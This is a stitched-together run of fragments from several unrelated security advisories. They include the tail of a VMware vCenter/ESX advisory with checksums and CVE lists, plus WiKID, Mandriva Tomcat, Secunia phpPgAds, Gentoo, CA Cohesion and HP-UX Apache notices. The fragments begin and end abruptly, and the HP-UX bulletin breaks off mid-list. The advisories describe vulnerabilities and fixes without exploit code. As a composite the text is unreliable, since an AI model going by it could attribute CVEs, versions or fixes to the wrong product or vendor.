File size: 1.8 GB
File type: .iso
MD5SUM: 057d55b32eb27fe5f3e01bc8d3df3bc5
SHA1SUM: c90134418c2e4d3d6637d8bee44261300ad95ec1
VMware vCenter Server 4 and modules
File size: 1.5 GB
File type: .zip
MD5SUM: f843d9c19795eb3bc5a77f5c545468a8
SHA1SUM: 9a7abd8e70bd983151e2ee40e1b3931525c4480c
VMware vSphere Client and Host Update Utility
File size: 113.8 MB
File type: .exe
MD5SUM: 6cc6b2c958e7e9529c284e48dfae22a9
SHA1SUM: f4c19c63a75d93cffc57b170066358160788c959
VMware vCenter Converter BootCD
File size: 98.8 MB
File type: .zip
MD5SUM: 3df94eb0e93de76b0389132ada2a3799
SHA1SUM: 5d7c04e4f9f8ae25adc8de5963fefd8a4c92464c
VMware vCenter Converter CLI (Linux)
File size: 36.9 MB
File type: .tar.gz
MD5SUM: 3766097563936ba5e03e87e898f6bd48
SHA1SUM: 36d485bdb5eb279296ce8c8523df04bfb12a2cb4
ESXi 4.0 Update 1
-----------------
ESXi400-200911201-UG
https://hostupdate.vmware.com/software/VUM/OFFLINE/release-155-20091116-013169/ESXi-4.0.0-update01.zip
md5sum:c6fdd6722d9e5cacb280bdcc2cca0627
sha1sum:de9d4875f86b6493f9da991a8cff37784215db2e
http://kb.vmware.com/kb/1014886
NOTE: The three ESXi patches for Firmware, VMware Tools, and the
VI Client "C" are contained in a single download file.
ESX 4.0 Update 1
----------------
https://hostupdate.vmware.com/software/VUM/OFFLINE/release-158-20091118-187517/ESX-4.0.0-update01.zip
md5sum: 68934321105c34dcda4cbeeab36a2b8f
sha1sum: 0d8ae58cf9143d5c7113af9692dea11ed2dd864b
http://kb.vmware.com/kb/1014842
To install an individual bulletin use esxupdate with the -b option.
esxupdate --bundle=ESX-4.0.0-update01.zip -b ESX400-200911223-UG
-b ESX400-200911238-SG -b ESX400-200911201-UG -b ESX400-200911235-SG
-b ESX400-200911237-SG -b ESX400-200911234-SG -b ESX400-200911232-SG
-b ESX400-200911233-SG update
5. References
CVE numbers
--- JRE ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1093
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1094
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1095
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1096
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1098
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1099
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1100
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1101
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1102
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1103
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1104
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1105
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1106
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2625
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2671
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2672
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2673
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2675
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2676
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2716
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2718
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2719
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2720
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2722
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2723
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2724
--- Tomcat ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5515
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0033
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0580
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0781
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5333
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0002
--- ntp ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159
--- kernel ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3528
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5700
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0028
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0322
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0675
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0676
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0778
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4307
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0834
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0787
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1439
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1633
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1072
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1630
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1192
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5966
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1385
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1389
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1895
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2406
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2407
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0745
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0746
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0747
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0748
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2847
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2848
--- python ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2052
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4965
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2315
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3144
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5031
--- bind ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0696
--- libxml and libxml2 ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2414
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416
--- curl --
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2417
--- gnutil ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2052
- ------------------------------------------------------------------------
6. Change log
2009-11-20 VMSA-2009-0016
Initial security advisory after release of vCenter 4.0 Update 1 and
ESX 4.0 Update 1 on 2009-11-19 and release of vMA Patch 2 on 2009-11-23.
- -----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Center
http://www.vmware.com/security
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/lifecycle/
Copyright 2009 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAksHAooACgkQS2KysvBH1xmQMACfTEcnuPanvucXPmgJCTT054o+
dtoAniXz+9xLskrkPr3oUzAcDeV729WG
=wSRz
-----END PGP SIGNATURE-----
.
Affected Products
=================
The WiKID Strong Authentication Server - Enterprise Edition
The WiKID Strong Authentication Server - Community Edition
References
==========
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5333
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6286
Mitigation
==========
Commercial users may download the most recent RPMs from the website:
http://www.wikidsystems.com/downloads/
Users of the open source community version may download packages from
Sourceforge:
https://sourceforge.net/project/showfiles.php?group_id=144774
- --
Nick Owen
WiKID Systems, Inc.
404-962-8983 (desk)
http://www.wikidsystems.com
Two-factor authentication, without the hassle factor. References
Tomcat release notes
tomcat.apache.org/security-5.html
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
- - ------------------------------------------------------------------------
6.
A cross-site scripting vulnerability was found in the
HttpServletResponse.sendError() method which could allow a remote
attacker to inject arbitrary web script or HTML via forged HTTP headers
(CVE-2008-1232).
A cross-site scripting vulnerability was found in the host manager
application that could allow a remote attacker to inject arbitrary
web script or HTML via the hostname parameter (CVE-2008-1947).
A traversal vulnerability was found when the 'allowLinking' and
'URIencoding' settings were actived which could allow a remote attacker
to use a UTF-8-encoded request to extend their privileges and obtain
local files accessible to the Tomcat process (CVE-2008-2938).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
56ca5eb3e331c6675634a5e3f3c5afd7 2008.0/i586/tomcat5-5.5.23-9.2.10.2mdv2008.0.i586.rpm
a1c688654decf045f80fb6d8978c73fa 2008.0/i586/tomcat5-admin-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm
2b7a97313ece05bbd5596045853cfca0 2008.0/i586/tomcat5-common-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm
e8384332efad0e2317a646241bece6ee 2008.0/i586/tomcat5-jasper-5.5.23-9.2.10.2mdv2008.0.i586.rpm
a30cc8061f55f2613c517574263cdd21 2008.0/i586/tomcat5-jasper-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
4f4a12c8479f27c7f9ed877f5821afa3 2008.0/i586/tomcat5-jsp-2.0-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm
ced904c459478c1123ed5da41dddbd7f 2008.0/i586/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
183e045a9b44747c7a4adaec5c860441 2008.0/i586/tomcat5-server-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm
78af5a5788ac359a99a24f03a39c7b94 2008.0/i586/tomcat5-servlet-2.4-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm
8e8569bfab5abef912299b9b751e49e9 2008.0/i586/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
6899c327906423cdd02b930221c2496e 2008.0/i586/tomcat5-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm
39fd3985d73f2f20efe4ed97c2a5e7c7 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.2mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
c4d1c4471c29d8cd34adb9f2002ef294 2008.0/x86_64/tomcat5-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
2caf09173a64a378636496196d99756f 2008.0/x86_64/tomcat5-admin-webapps-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
d6a9a290638267a1117a55041986d31a 2008.0/x86_64/tomcat5-common-lib-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
2eead87d72af58ddc9e934b55e49a1aa 2008.0/x86_64/tomcat5-jasper-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
0fab26f89e83c882c5948a430bf82c8b 2008.0/x86_64/tomcat5-jasper-javadoc-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
833334424b555a77e2a9951b71ed8fa3 2008.0/x86_64/tomcat5-jsp-2.0-api-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
115561d6233c3890cf3b85a7599ed03b 2008.0/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
eccf76ede6fb9256a2b52c861a9b0bb3 2008.0/x86_64/tomcat5-server-lib-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
cd9df1a8a1a5cb3216221bdefdfe8476 2008.0/x86_64/tomcat5-servlet-2.4-api-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
f7440a4111ec2fd30fa32e4bd74a0a20 2008.0/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
1464eb297888c4df98d8b7eabe7f0197 2008.0/x86_64/tomcat5-webapps-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
39fd3985d73f2f20efe4ed97c2a5e7c7 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.2mdv2008.0.src.rpm
Mandriva Linux 2008.1:
594abdc70bc430657eb831520926c73f 2008.1/i586/tomcat5-5.5.25-1.2.1.1mdv2008.1.i586.rpm
bdec2b83b4fdb4d10a01a65fbdac512d 2008.1/i586/tomcat5-admin-webapps-5.5.25-1.2.1.1mdv2008.1.i586.rpm
3dbc007722996d1c36f31642f80b5c2a 2008.1/i586/tomcat5-common-lib-5.5.25-1.2.1.1mdv2008.1.i586.rpm
04b23d162d13f84d1d8707646ea9148c 2008.1/i586/tomcat5-jasper-5.5.25-1.2.1.1mdv2008.1.i586.rpm
602bf7d4ff261e8af20d50b9e76634bb 2008.1/i586/tomcat5-jasper-eclipse-5.5.25-1.2.1.1mdv2008.1.i586.rpm
0066e7519a2d3478f0a3e70bd95a7e5b 2008.1/i586/tomcat5-jasper-javadoc-5.5.25-1.2.1.1mdv2008.1.i586.rpm
1ba4743762cfa4594a27f0393de47823 2008.1/i586/tomcat5-jsp-2.0-api-5.5.25-1.2.1.1mdv2008.1.i586.rpm
262f2a39b800562cef36d724ce3efa35 2008.1/i586/tomcat5-jsp-2.0-api-javadoc-5.5.25-1.2.1.1mdv2008.1.i586.rpm
b9f2af35a734d0e3a2d9bfe292aaced1 2008.1/i586/tomcat5-server-lib-5.5.25-1.2.1.1mdv2008.1.i586.rpm
8307ef374c5b995feac394b6f27474d5 2008.1/i586/tomcat5-servlet-2.4-api-5.5.25-1.2.1.1mdv2008.1.i586.rpm
3f4692170c35f992defcb4111a8133cd 2008.1/i586/tomcat5-servlet-2.4-api-javadoc-5.5.25-1.2.1.1mdv2008.1.i586.rpm
02b9d28af879b825754eff6199bf1788 2008.1/i586/tomcat5-webapps-5.5.25-1.2.1.1mdv2008.1.i586.rpm
2621d41df35e895a1ed0ed471f93f211 2008.1/SRPMS/tomcat5-5.5.25-1.2.1.1mdv2008.1.src.rpm
Mandriva Linux 2008.1/X86_64:
6b1e03e5206eb262970198dccba7d0a3 2008.1/x86_64/tomcat5-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
930cf38058a0f8902e2741c6512e0aa0 2008.1/x86_64/tomcat5-admin-webapps-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
c527521cb93bab31df3f91422faf02a6 2008.1/x86_64/tomcat5-common-lib-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
f8bef98047ef956c8e4c0f877155e1f1 2008.1/x86_64/tomcat5-jasper-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
97a8a59178259d26838ce20c176c459a 2008.1/x86_64/tomcat5-jasper-eclipse-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
3bb885debc8576bd305c9fa4c9d25bfb 2008.1/x86_64/tomcat5-jasper-javadoc-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
66dcf08e163fdaaf81992a7d25d84a20 2008.1/x86_64/tomcat5-jsp-2.0-api-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
dd92aab81bf4c75ab30b9b82153b24c0 2008.1/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
517ed776282d089dd84f81d47104f660 2008.1/x86_64/tomcat5-server-lib-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
83d4bb973b7fec461e812d74541a5949 2008.1/x86_64/tomcat5-servlet-2.4-api-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
cbdd58e1c9e1e8f0089af055abbd85e0 2008.1/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
cbee0f1f720269f77a66e30709ecd7ae 2008.1/x86_64/tomcat5-webapps-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
2621d41df35e895a1ed0ed471f93f211 2008.1/SRPMS/tomcat5-5.5.25-1.2.1.1mdv2008.1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFIwYsKmqjQ0CJFipgRApJjAKCVZ1XtEGoADQcp8l/m1ECSRstnjACg4qE8
j+sCdAEJN0CXvurmFcjUvNU=
=+kFf
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. HP has updated the Apache Tomcat and Oracle database software to
address vulnerabilities affecting confidentiality, availability, and
integrity. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
phpPgAds XML-RPC PHP Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA15884
VERIFY ADVISORY:
http://secunia.com/advisories/15884/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
>From remote
SOFTWARE:
phpPgAds 2.x
http://secunia.com/product/4577/
DESCRIPTION:
A vulnerability has been reported in phpPgAds, which can be exploited
by malicious people to compromise a vulnerable system.
http://sourceforge.net/project/showfiles.php?group_id=36679
OTHER REFERENCES:
SA15852:
http://secunia.com/advisories/15852/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200703-0007 | CVE-2007-0450 |
Multiple PHP XML-RPC implementations vulnerable to code injection
Related entries in the VARIoT exploits database: VAR-E-200703-0008, VAR-E-200703-0006, VAR-E-200703-0005, VAR-E-200703-0007, VAR-E-200703-0002, VAR-E-200703-0001, VAR-E-200703-0003, VAR-E-200703-0004 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache. A vulnerability in a common PHP extension module could allow a remote attacker to execute code on a vulnerable system. Apache HTTP servers running with the Tomcat servlet container are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows attackers to access arbitrary files in the Tomcat webroot. This can expose sensitive information that could help the attacker launch further attacks.
Versions in the 5.0 series prior to 5.5.22 and in the 6.0 series prior to 6.0.10 are vulnerable. Note that this vulnerability can only be exploited when using
apache proxy modules like mod_proxy, mod_rewrite or mod_jk.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Tomcat users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-servers/tomcat-5.5.22"
References
==========
[ 1 ] CVE-2007-0450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200705-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Title: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities
CA Advisory Reference: CA20090123-01
CA Advisory Date: 2009-01-23
Reported By: n/a
Impact: Refer to the CVE identifiers for details.
Summary: Multiple security risks exist in Apache Tomcat as
included with CA Cohesion Application Configuration Manager. CA
has issued an update to address the vulnerabilities. Refer to the
References section for the full list of resolved issues by CVE
identifier.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a Medium risk rating.
Affected Products:
CA Cohesion Application Configuration Manager 4.5
Non-Affected Products
CA Cohesion Application Configuration Manager 4.5 SP1
Affected Platforms:
Windows
Status and Recommendation:
CA has issued the following update to address the vulnerabilities.
CA Cohesion Application Configuration Manager 4.5:
RO04648
https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search
&searchID=RO04648
How to determine if you are affected:
1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the
"C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is
vulnerable.
Workaround: None
References (URLs may wrap):
CA Support:
http://support.ca.com/
CA20090123-01: Security Notice for Cohesion Tomcat
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1975
40
Solution Document Reference APARs:
RO04648
CA Security Response Blog posting:
CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2009/01/23.aspx
Reported By:
n/a
CVE References:
CVE-2005-2090
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090
CVE-2005-3510
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3510
CVE-2006-3835
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3835
CVE-2006-7195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7195
CVE-2006-7196
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7196
CVE-2007-0450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
CVE-2007-1355
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1355
CVE-2007-1358
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1358
CVE-2007-1858
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1858
CVE-2007-2449
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2449
CVE-2007-2450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2450
CVE-2007-3382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382
CVE-2007-3385 *
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385
CVE-2007-3386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3386
CVE-2008-0128
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128
*Note: the issue was not completely fixed by Tomcat maintainers.
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
v1.1 - Updated Impact, Summary, Affected Products
Customers who require additional information should contact CA
Technical Support at http://support.ca.com.
For technical questions or comments related to this advisory,
please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your
findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1777
82
Regards,
Ken Williams, Director ; 0xE2941985
CA Product Vulnerability Response Team
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2009 CA. All rights reserved. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01178795
Version: 1
HPSBUX02262 SSRT071447 rev. 1 - HP-UX running Apache, Remote Arbitrary Code Execution, Cross Site Scripting (XSS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2007-10-02
Last Updated: 2007-10-02
Potential Security Impact: Remote arbitrary code execution, cross site scripting (XSS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with Apache running on HP-UX. The vulnerabilities could be exploited remotely via Cross Site Scripting (XSS) to execute arbitrary code.
References: CVE-2005-2090, CVE-2006-5752, CVE-2007-0450, CVE-2007-0774, CVE-2007-1355, CVE-2007-1358, CVE-2007-1860, CVE-2007-1863, CVE-2007-1887, CVE-2007-1900, CVE-2007-2449, CVE-2007-2450, CVE-2007-2756, CVE-2007-2872, CVE-2007-3382, CVE-2007-3385, CVE-2007-3386.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running Apache
BACKGROUND
To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed.
AFFECTED VERSIONS
For IPv4:
HP-UX B.11.11
=============
hpuxwsAPACHE
action: install revision A.2.0.59.00 or subsequent
restart Apache
URL: https://www.hp.com/go/softwaredepot/
For IPv6:
HP-UX B.11.11
